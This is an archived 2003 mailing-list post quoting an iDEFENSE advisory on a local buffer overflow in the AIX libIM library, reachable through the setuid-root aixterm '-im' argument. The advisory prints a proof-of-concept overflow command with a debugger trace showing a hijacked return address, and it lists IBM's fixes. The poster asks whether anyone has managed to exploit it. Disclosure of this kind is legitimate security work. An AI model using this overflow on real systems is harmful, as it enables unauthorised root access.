From: Herman, Tim [CC] (Tim.Herman@MAIL.SPRINT.COM)
Date: Thu Feb 13 2003 - 15:26:35 EST
Anybody been able to exploit this exploit?
quoting...
Buffer Overflow Exists in AIX libIM Library (iDEFENSE Exclusive): A locally
exploitable buffer overflow vulnerability exists in libIM allowing an
attacker to obtain the privileges of an application calling the library. The
"/usr/lpp/X11/bin/aixterm" binary calls the libIM library and is installed
setuid root by default on AIX.
The "-im" command line argument used by aixterm causes the binary to crash
when filled with a string approximately 50 bytes in length. This allows an
attacker to gain control of the return address of the executing function,
and as a result, a local attacker can execute arbitrary code as root.
Sources: iDEFENSE Labs, Feb. 11, 2003
Euan Briggs, Oct. 31, 2002
IBM AIX Security (Shiva Persaud (shivapd@us.ibm.com)), Jan. 28, 2003
Analysis: (iDEFENSE US) Exploitation of this vulnerability can give a
local attacker root access to an affected system. Advanced Interactive
eXecutive (AIX) is IBM's Unix operating system implementation, native to
pSeries and RS/6000 servers. More information is available at
http://www-1.ibm.com/servers/aix/ .
AIX provides support for National Language Support (NLS). From the AIX
manual, "NSL provides commands and Standard C Library subroutines for a
single worldwide system base. An internationalized system has no built-in
assumptions or dependencies on language-specific or cultural-specific
conventions such as:
* Code sets
* Character classifications
* Character comparison rules
* Character collation order
* Numeric and monetary formatting
* Date and time formatting
* Message-text language
All information pertaining to cultural conventions and language is obtained
at process run time."
libIM is a system library that is used by NLS on AIX.
Detection: This vulnerability affects applications using libIM on AIX 4.3,
5.1 and 5.2.
Exploit: The following shows how the "-im" command line argument can be
filled and cause the crash of aixterm, giving the user control of the return
address. We will write the value of 0x11223344 into the appropriate
register:
$ ls -la /usr/lpp/X11/bin/aixterm
-rwsr-xr-x 1 root system 376384 Mar 18 2001 /usr/lpp/X11/bin/aixterm*
$ cp -p /usr/lpp/X11/bin/aixterm test
$ ./test -im `perl -e'print"A"x47;print pack("l",0x11223344)'`
1363-009 aixterm: Cannot open font -dt-interface
user-medium-r-normal-l*-*-*-*-*-*-*-*-*.
Check path name and permissions.
1363-009 aixterm: Cannot open font
-*-roman-medium-r-normal--8-50-100-100-c-*-ISO8859-1.
Check path name and permissions.
Illegal instruction (core dumped)
$ dbx ./test core
Type 'help' for help.
reading symbolic information ...warning: no source compiled with -g
[using memory image in core]
warning: Unable to access address 0x41414149 from core
Illegal instruction (reserved addressing fault) in . at 0x11223344 ($t1)
warning: Unable to access address 0x11223344 from core 0x11223344 (???)
warning:
Unable to access address 0x11223344 from core ffffffff
warning: Unable to access address 0x11223344 from core fnmadd.
fr31,fr31,fr31,fr31
(dbx)
Vendor Fix: Official Fix: IBM provides the following fixes:
APAR number for AIX 4.3.3: IY40307 (available approx. 03/12/2003)
APAR number for AIX 5.1.0: IY40317 (available approx. 04/28/2003)
APAR number for AIX 5.2.0: IY40320 (available approx. 04/28/2003)
NOTE: Fixes will not be provided for versions prior to 4.3 as these are no
longer supported by IBM. Affected customers are urged to upgrade to 4.3.3 or
5.1.0 at the latest maintenance level.
E-fix: Temporary fixes for AIX 4.3.3, 5.1.0, and 5.2.0 systems are
available.
The temporary fixes can be downloaded via ftp from:
ftp://aix.software.ibm.com/aix/efixes/security/libIM_efix.tar.Z
The efix compressed tarball contains three fixes: one each for AIX 4.3.3,
AIX 5.1.0 and AIX 5.2.0. It also includes an advisory and a README file with
installation instructions.
This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 22:16:35 EDT